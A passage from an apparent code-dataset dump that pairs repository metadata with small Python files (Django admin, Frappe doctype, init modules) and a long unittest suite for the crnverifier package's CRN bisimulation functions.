] | 24 | 2019-07-08T14:29:18.000Z | 2022-03-19T13:57:34.000Z | from .embracenet import EmbraceNet | 34 | 34 | 0.882353 | 4 | 34 | 7.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
368913361556ab70196b404e04cddb66927b53c8 | 169 | py | Python | main/admin.py | elhamrazi/ElhamBlog | e10240f16770b3aec505dda27cb0456be05bdddc | [
"MIT"
] | 5 | 2021-10-19T06:23:23.000Z | 2022-03-09T13:57:06.000Z | main/admin.py | elhamrazi/ElhamBlog | e10240f16770b3aec505dda27cb0456be05bdddc | [
"MIT"
] | null | null | null | main/admin.py | elhamrazi/ElhamBlog | e10240f16770b3aec505dda27cb0456be05bdddc | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import *
admin.site.register(Author)
admin.site.register(Post)
admin.site.register(Comment)
# Register your models here.
| 18.777778 | 32 | 0.792899 | 24 | 169 | 5.583333 | 0.541667 | 0.201493 | 0.380597 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106509 | 169 | 8 | 33 | 21.125 | 0.887417 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
36b1ac352f724f2747a428cd2d23936e86bd2c75 | 59 | py | Python | config/__init__.py | rrhg/accounting-data-entry-helper | 81486c4b4bdff315966a7a61b2c45aa4d8e71fe8 | [
"MIT"
] | null | null | null | config/__init__.py | rrhg/accounting-data-entry-helper | 81486c4b4bdff315966a7a61b2c45aa4d8e71fe8 | [
"MIT"
] | 1 | 2022-02-07T20:22:13.000Z | 2022-02-07T20:22:13.000Z | config/__init__.py | rrhg/accounting-data-entry-helper | 81486c4b4bdff315966a7a61b2c45aa4d8e71fe8 | [
"MIT"
] | null | null | null | from .config import *
# TODO should config be just a file
| 14.75 | 35 | 0.728814 | 10 | 59 | 4.3 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220339 | 59 | 3 | 36 | 19.666667 | 0.934783 | 0.559322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7ffcdee24bc66e9564535ceea05f47eb2500d311 | 40 | py | Python | python/qitest/test/projects/testme/test/test_foo.py | vbarbaresi/qibuild | eab6b815fe0af49ea5c41ccddcd0dff2363410e1 | [
"BSD-3-Clause"
] | null | null | null | python/qitest/test/projects/testme/test/test_foo.py | vbarbaresi/qibuild | eab6b815fe0af49ea5c41ccddcd0dff2363410e1 | [
"BSD-3-Clause"
] | null | null | null | python/qitest/test/projects/testme/test/test_foo.py | vbarbaresi/qibuild | eab6b815fe0af49ea5c41ccddcd0dff2363410e1 | [
"BSD-3-Clause"
] | null | null | null | def test_foo():
assert 42 == 40 + 2
| 13.333333 | 23 | 0.55 | 7 | 40 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 0.3 | 40 | 2 | 24 | 20 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3d38ae78810fb35113d3b4230abb796352905155 | 203 | py | Python | frappe_health_ec/frappe_health_ec/doctype/identificationtype/identificationtype.py | lapillaga/frappe_health_ec | 5675e3da97550b6e8cf10d15d342144818ec2fee | [
"MIT"
] | null | null | null | frappe_health_ec/frappe_health_ec/doctype/identificationtype/identificationtype.py | lapillaga/frappe_health_ec | 5675e3da97550b6e8cf10d15d342144818ec2fee | [
"MIT"
] | null | null | null | frappe_health_ec/frappe_health_ec/doctype/identificationtype/identificationtype.py | lapillaga/frappe_health_ec | 5675e3da97550b6e8cf10d15d342144818ec2fee | [
"MIT"
] | null | null | null | # Copyright (c) 2021, Lugo S.A.S and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
class IdentificationType(Document):
pass
| 22.555556 | 49 | 0.788177 | 28 | 203 | 5.714286 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022857 | 0.137931 | 203 | 8 | 50 | 25.375 | 0.891429 | 0.536946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
3d41dc13aee94ef6c2f512b23f7f9ddb8708986c | 75,681 | py | Python | tests/test_crn_bisimulation.py | DNA-and-Natural-Algorithms-Group/crnverifier | c78b1165bd4fdfc3972cf943b9e8e1b1c9ee42fe | [
"MIT"
] | null | null | null | tests/test_crn_bisimulation.py | DNA-and-Natural-Algorithms-Group/crnverifier | c78b1165bd4fdfc3972cf943b9e8e1b1c9ee42fe | [
"MIT"
] | null | null | null | tests/test_crn_bisimulation.py | DNA-and-Natural-Algorithms-Group/crnverifier | c78b1165bd4fdfc3972cf943b9e8e1b1c9ee42fe | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# tests/test_crn_bisimulation.py
# Original source from the Nuskell compiler project
#
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import unittest
from crnverifier.utils import parse_crn
from crnverifier.crn_bisimulation import (SpeciesAssignmentError,
EnumSpeciesAssignmentError,
# Main interface
crn_bisimulations,
crn_bisimulation_test,
modular_crn_bisimulation_test,
# HelperTests
minimal_implementation_states,
subsetsL,
enumL,
same_reaction,
trivial_reaction,
makeT,
checkT,
# ConditionTests
passes_atomic_condition,
passes_delimiting_condition,
passes_permissive_condition,
# Individual test classes
search_column,
search_row,
passes_modularity_condition,
# Just used
subst)
SKIP_SLOW = True # NOTE: takes about 6-7 days now!!!
SKIP_DEBUG = False
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class JustCuriousTests(unittest.TestCase):
# Some small examples that are easy to verify.
def test_me_quickly_00(self):
assert list(crn_bisimulations([], [])) == [dict()]
fcrn = "A -> B"
fcrn, fs = parse_crn(fcrn)
assert list(crn_bisimulations(fcrn, [])) == []
fcrn = " -> B"
icrn = "a -> b"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
icrn = "a -> b"
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations([], icrn))
assert len(bisims) == 1
assert {'a': [], 'b': []} in bisims
icrn = "a -> b"
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations([], icrn, formals = set(['A'])))
assert len(bisims) == 1
assert {'a': ['A'], 'b': ['A']} in bisims
icrn = "a -> b; c -> d"
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations([], icrn, formals = set(['A', 'B'])))
assert len(bisims) == 2
assert {'a': ['A'], 'b': ['A'], 'c': ['B'], 'd': ['B']} in bisims
assert {'a': ['B'], 'b': ['B'], 'c': ['A'], 'd': ['A']} in bisims
def test_me_quickly_01(self):
fcrn = "A + B -> C"
icrn = "x + y -> c + d"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 4:
print('FAILURE:')
for e, b in enumerate(bisims, 1):
print(e, b)
assert len(bisims) == 4
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
def test_me_quickly_02(self):
fcrn = " -> A"
icrn = " -> y; y -> a"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
b1 = {'a': ['A'], 'y': ['A']}
b2 = {'a': ['A'], 'y': []}
assert len(bisims) == 2
assert b1 in bisims
assert b2 in bisims
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
def test_me_quickly_03(self):
fcrn = " -> A"
icrn = " -> y; y <=> z; z -> a"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
b1 = {'a': ['A'], 'y': ['A'], 'z': ['A']}
b2 = {'a': ['A'], 'y': [], 'z': []}
if len(bisims) != 2:
print('FAILURE:')
for e, b in enumerate(bisims):
print(e, b)
assert len(bisims) == 3 # Should be two, but in the present implementation it makes sense that it is 3!
assert b1 in bisims
assert b2 in bisims
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
def test_me_quickly_04(self):
fcrn = "A -> "
icrn = "a -> y; y <=> z; z -> "
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 2:
print('FAILURE:')
for e, b in enumerate(bisims):
print(e, b)
b1 = {'a': ['A'], 'y': [], 'z': []}
b2 = {'a': ['A'], 'y': ['A'], 'z': ['A']}
assert len(bisims) == 2
assert b1 in bisims
assert b2 in bisims
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
def test_me_quickly_false(self):
fcrn = "A + B -> C"
icrn = "x + y + z -> c + d"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
fcrn = " -> A"
icrn = " y -> a"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'loopsearch'))
assert bisims == list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class HelperTests(unittest.TestCase):
""" Helper functions for CRN bisimulation:
- minimal_implementation_states
- subsetsL
- enumL
- same_reaction
- trivial_reaction
- makeT
- checkT
"""
def test_minimal_implementation_states_exact(self):
state = []
inter = {'a': ['A'],
'b': ['B'],
'x': ['A', 'B'],
'y': ['A', 'A']}
assert list(minimal_implementation_states(state, inter)) == [[]]
state = ['A']
inter = {'a': ['A'],
'b': ['B'],
'x': ['A', 'B'],
'y': ['A', 'A']}
minis = [['a'], ['x'], ['y']]
assert list(minimal_implementation_states(state, inter)) == minis
def test_minimal_implementation_states_supersets(self):
# NOTE: these used to return supersets, but now
# that should be fixed.
state = ['A', 'A']
inter = {'a': ['A'],
'b': ['B'],
'x': ['A', 'B'],
'y': ['A', 'A']}
minis = [['a', 'a'], ['a', 'x'], ['x', 'x'], ['y']]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
state = []
inter = {'a': [],
'b': []}
minis = [[]]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
state = ['A', 'B']
inter = {'a': ['A'],
'b': ['B'],
'c': ['C'],
'x': ['A', 'B']}
minis = [['a', 'b'], ['x']]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
state = ['A', 'B', 'A']
inter = {'a': ['A'],
'b': ['B'],
'c': ['C'],
'x': ['A', 'B']}
minis = [['a', 'a', 'b'], ['x', 'a'], ['x', 'x']]
supfs = list(map(sorted, minimal_implementation_states(state, inter)))
assert all(sorted(m) in supfs for m in minis)
assert len(minis) == len(supfs)
def test_subsets(self):
#['A'] => [[], ['A']]
#['A', 'A'] => [[], ['A'], ['A', 'A']
#['A', 'B'] => [[], ['A'], ['B'], ['A', 'B']
assert sorted(subsetsL([])) == [()]
assert sorted(subsetsL(['A'])) == [(), ('A',)]
assert sorted(subsetsL(['A', 'A'])) == [(), ('A',), ('A',), ('A', 'A')]
assert sorted(set(subsetsL(['A', 'A']))) == [(), ('A',), ('A', 'A')]
assert sorted(subsetsL(['A', 'B'])) == sorted([(), ('A',), ('B',), ('A', 'B')])
assert sorted(set(subsetsL(['A', 'A', 'B']))) == sorted(
[(), ('A',), ('B',),
('A', 'A'), ('A', 'B'),
('A', 'A', 'B')])
def test_enum_noweights(self):
# For example:
# - n = 3 for three unassinged implmentation species (x, y, z).
assert list(enumL(0, [])) == [[]]
assert list(enumL(1, [])) == [[()]]
assert list(enumL(2, [])) == [[(), ()]]
assert list(enumL(3, [])) == [[(), (), ()]]
assert list(enumL(4, [])) == [[(), (), (), ()]]
assert list(enumL(0, ['A'])) == [[]]
assert list(enumL(1, ['A'])) == [[('A',)]]
assert list(enumL(1, ['A', 'B', 'C'])) == [[('A', 'B', 'C')]]
assert sorted(enumL(2, ['A'])) == sorted([[('A',), ()], [(), ('A',)]])
assert sorted(enumL(3, ['A', 'B'])) == sorted([
[('A',), ('B',), ()],
[('A',), (), ('B',)],
[('B',), ('A',), ()],
[('B',), (), ('A',)],
[(), ('A',), ('B',)],
[(), ('B',), ('A',)],
[('A', 'B'), (), ()],
[(), ('A', 'B'), ()],
[(), (), ('A', 'B')]])
assert sorted(enumL(2, ['A', 'A', 'B'])) == sorted([
[(), ('A', 'A', 'B')],
[('A', 'A', 'B'), ()],
[('A', 'B'), ('A',)],
[('A', 'A'), ('B',)],
[('B',), ('A', 'A')],
[('A',), ('A', 'B')]])
assert sorted(enumL(2, ['A', 'B', 'C'])) == sorted([
[('A', 'B', 'C'), ()],
[(), ('A', 'B', 'C')],
[('A',), ('B', 'C')],
[('B',), ('A', 'C')],
[('C',), ('A', 'B')],
[('A', 'B'), ('C',)],
[('A', 'C'), ('B',)],
[('B', 'C'), ('A',)]])
def test_enum_weights(self):
assert list(enumL(0, [], weights = [])) == [[]]
assert list(enumL(1, [], weights = [1])) == [[()]]
assert list(enumL(2, [], weights = [1, 1])) == [[(), ()]]
assert list(enumL(3, [], weights = [1, 2, 3])) == [[(), (), ()]]
assert list(enumL(1, ['A'], weights = [1])) == [[('A',)]]
with self.assertRaises(EnumSpeciesAssignmentError):
assert list(enumL(1, ['A'], weights = [2])) == [[()]]
assert list(enumL(1, ['A', 'A'], weights = [2])) == [[('A',)]]
assert sorted(list(enumL(2, ['A', 'A'], weights = [2, 1]))) == sorted(
[[('A',), ()], [(), ('A', 'A')]])
assert sorted(list(enumL(2, ['A', 'A'], weights = [1, 2]))) == sorted(
[[(), ('A',)], [('A', 'A'), ()]])
assert sorted(list(enumL(2, ['A', 'B'], weights = [1, 2]))) == sorted(
[[('A', 'B'), ()]])
assert sorted(list(enumL(2, ['A', 'A', 'B'], weights = [1, 2]))) == sorted(
[[('A', 'A', 'B'), ()],
[('B',), ('A',)]])
assert sorted(list(enumL(3, list('AAAAB'), weights = [2, 1, 2]))) == sorted([
[(), ('A', 'A', 'A', 'A', 'B'), ()],
[('A',), ('A', 'A', 'B'), ()],
[(), ('A', 'A', 'B'), ('A',)],
[('A', 'A'), ('B',), ()],
[(), ('B',), ('A', 'A')],
[('A',), ('B',), ('A',)]])
def test_same_reaction(self):
frxn = "A + B -> C"
irxn = "A + B -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C + B"
irxn = "A + b -> B"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_same_reaction_new(self):
# trying to break the old code ...
frxn = "A -> C + D"
irxn = "A + y -> C + y"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "A -> C"
irxn = "A + y -> C + y"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> B + B"
irxn = "i5 + i5 -> i8"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "B + B -> A + B"
irxn = "i5 -> i8 + i8"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_same_reaction_products(self):
frxn = "A + B -> C + D"
irxn = "A + B -> c"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B -> c + d"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B -> "
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B -> C + B"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_same_reaction_reactants(self):
# NOTE: tests include potential null species ...
frxn = "A + B -> C"
irxn = "a -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A -> C + D"
irxn = "a + b -> C + D"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A -> C + D"
irxn = "A + b -> C + D"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B + A -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_trivial_reaction(self):
fs = set(list('ABC'))
irxn = "x -> y"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
fs = set(list('ABC'))
irxn = "x -> A"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
fs = set(list('ABC'))
irxn = "A -> y"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
fs = set(list('ABC'))
irxn = "x + y -> A"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
fs = set(list('ABC'))
irxn = "x + y -> A + B"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
fs = set(list('ABC'))
irxn = "x + x -> A + B"
icrn, _ = parse_crn(irxn)
assert not trivial_reaction(icrn[0], fs)
fs = set(list('ABC'))
irxn = "a + x + x -> A + B + y"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
def test_update_table(self):
fcrn = "A + B -> C"
icrn = "x + y -> c + d"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, True]]
assert makeT(fcrn, icrn, fs) == table
fcrn = "A + B -> C"
icrn = "A + B -> C + d"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, False]]
assert makeT(fcrn, icrn, fs) == table
fcrn = " -> A"
icrn = " -> y; y <=> z; z -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, True],
[True, True],
[True, True],
[True, True]]
assert makeT(fcrn, icrn, fs) == table
fcrn = " -> A"
icrn = " -> A; A <=> A; A -> A"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, False],
[False, True],
[False, True],
[False, True]]
assert makeT(fcrn, icrn, fs) == table
fcrn = " -> A"
icrn = " -> ; <=> ; -> A"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[False, True],
[False, True],
[False, True],
[True, False]]
assert makeT(fcrn, icrn, fs) == table
def test_update_table_large(self):
fcrn = """ A + b -> c
b -> c
c -> b
b -> 2b """
icrn = """ A -> i7
i7 -> A
i7 + b -> i19
b -> i96
b -> i148
i7 + b -> i19
b -> i96
b -> i148
i7 + b -> i19
b -> i96
b -> i148
c -> i340
c -> i340
i19 -> c
i96 -> c
i148 -> b + b
i340 -> b """
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[False, False, False, False, True],
[False, False, False, False, True],
[True, True, False, True, True],
[False, True, False, True, True],
[False, True, False, True, True],
[True, True, False, True, True],
[False, True, False, True, True],
[False, True, False, True, True],
[True, True, False, True, True],
[False, True, False, True, True],
[False, True, False, True, True],
[False, False, True, False, True],
[False, False, True, False, True],
[True, True, False, False, True],
[True, True, False, False, True],
[False, False, False, True, True],
[False, False, True, False, True]]
assert makeT(fcrn, icrn, fs) == table
def test_check_table(self):
table = [[True, True]]
assert checkT(table) is True
table = [[False, False]]
assert checkT(table) is False
table = [[True, True],
[False, False]]
assert checkT(table) is False
table = [[False, True],
[True, False]]
assert checkT(table) is True
table = [[False, False],
[True, True]]
assert checkT(table) is False
table = [[True, False],
[True, False]]
assert checkT(table) is True
table = [[True, True, False],
[False, True, False]]
assert checkT(table) is True
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class ConditionTests(unittest.TestCase):
def test_atomic_01(self):
fs = set(['A', 'B', 'C'])
inter = {'a' : ['B'],
'B' : ['A'],
'c' : ['C']}
assert passes_atomic_condition(inter, fs)
def test_delimiting_01(self):
fcrn = "A + B -> C"
icrn = "a + b -> c"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['B'],
'b' : ['A'],
'c' : ['C']}
assert passes_delimiting_condition(fcrn, icrn, fs, inter)
def test_permissive_01(self):
fcrn = "A + B -> C"
icrn = "a + b -> c"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['B'],
'b' : ['A'],
'c' : ['C']}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_02(self):
fcrn = " -> A"
icrn = "x -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'x' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert not passes
def test_permissive_03(self):
fcrn = " -> A"
icrn = " -> x; x -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'x' : ['A']}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
inter = {'a' : ['A'],
'x' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_03b(self):
fcrn = " -> A"
icrn = " -> x; -> y; x + y -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'x' : [],
'y' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
inter = {'a' : ['A'],
'x' : ['A'],
'y' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_04(self):
fcrn = "B -> A"
icrn = "b -> b + x; b + 3x -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'b' : ['B'],
'x' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_05(self):
fcrn = "A -> B"
icrn = "x -> y; y -> x + z; x + 3z -> b"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'x' : ['A'],
'b' : ['B'],
'y' : ['A'],
'z' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_06(self):
fcrn = "A + B -> C + D"
icrn = "a + b -> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter={'a': ['B'], 'b': ['A'], 'c': [], 'd': ['A', 'B'], 'e': ['C'], 'f': ['D']}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert not passes
def test_permissive_07(self):
# JDW 2019
fcrn = "A + B -> C"
icrn = """ a1 <=> a2
a2 + b1 <=> ab
ab -> a1 + b1 + 2z
b1 + 3z -> b2
a1 + b2 + 2z -> c1
a2 + b2 -> c2
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter={'a1': ['A'],
'a2': ['A'],
'b1': ['B'],
'b2': ['B'],
'ab': ['A', 'B'],
'c1': ['C'],
'c2': ['C'],
'z': []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_08(self):
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter = {'i{A}': ['A'],
'i{B}': ['B'],
'i{C}': ['C'],
'i{X}': ['X'],
'i{Y}': ['Y'],
'i14': [],
'i15': [],
'i73': ['B'],
'i119': ['X', 'B', 'A'],
'i120': [],
'i194': [],
